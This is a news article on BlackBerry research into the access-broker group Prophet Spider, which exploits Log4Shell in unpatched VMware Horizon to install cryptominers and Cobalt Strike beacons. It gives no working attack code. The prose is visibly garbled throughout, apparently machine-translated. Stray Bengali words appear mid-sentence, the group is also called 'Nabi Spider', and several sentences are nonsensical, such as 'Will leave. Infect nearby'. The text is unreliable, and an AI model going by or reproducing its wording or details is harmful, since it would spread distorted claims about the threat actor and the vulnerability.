A gang of cyber criminals known to gain access to computer systems and sell access to them has been discovered using an Apache Log4j vulnerability, Log4Shell, cryptocurrency and backdoor on Unpached VMware Horizon.
In a blog published on Wednesday, BlackBerry researchers Ryan Gibson, Cody Starks and Will Icard have revealed that the Prophet was behind the spider attack, which can be reliably identified by observing the Tomcat service ws_TomcatService.exe used by VMware Horizon.
The researchers explained that after exploiting the Log4Shell vulnerability to gain access to a system, the attackers used the PowerShell command to download the second level payload. In the case of Prophet Spider, payloads were primarily cryptocurrency mining software, although in some cases, cobalt strike beacons এক a type of system backdoor ও were also installed on computers.
One of the indicators that helps pin the Prophet’s spider attacks is to save malicious files using the C: Windows Temp 7fde folder path, the researchers wrote. The threat actor also downloaded a copy of wget.bin executable, which was used by the group to get additional files on historically infected hosts. The IP address used in the download cradle has also been attributed to the group before.
Prophet Spider suggests an improvement in foothold exploitation
Tony Lee, vice president of BlackBerry Global Services and Technical Operations, explained that early access brokers like Nabi Spider enter a computer system, set foot, and then sell that access to other malicious actors who would perform data theft activities through the system. Will leave. Infect nearby, or with ransomware. “If they find a weakness, they’ll use it,” he said, “and then wait to see who will be the highest bidder.”
“Now that they have the ability to keep a foothold in the system, I think we’ll see an improvement in Log4j exploitation,” Lee added.
Lee acknowledged that it was impossible to determine the number of systems compromised by the group. “They can take anywhere from a few weeks to a month to sell access,” he explains. However, he said the BlackBerry Research and Intelligence and Incident Response team has been able to ensure penetration into multiple organizations.
No individual art appears to be the crosshair of the vertical gang. “They seem opportunistic,” Lee said. “We didn’t see a specific vertical being targeted. It’s more along the line of ‘spray and prayer’.”
Many VMware implementations remain unpatched
In their blog post, BlackBerry researchers noted that the exact number of applications এবং and their various versions Log are never fully known to be affected by Log4j vulnerabilities. Although VMware released a patch and mitigation guideline in December 2021 in response to vulnerabilities, they explained that many implementations were not patched, leaving them vulnerable to exploitation.
“It’s difficult for many organizations to scan and patch all of their digital assets, even just outwardly,” Lee said. “I see companies struggling to identify their assets. If you can’t identify them, you can’t scan them. And if you can’t scan them, you can’t have effective vulnerability management programs. “
Copyright © 2022 IDG Communications, Inc.
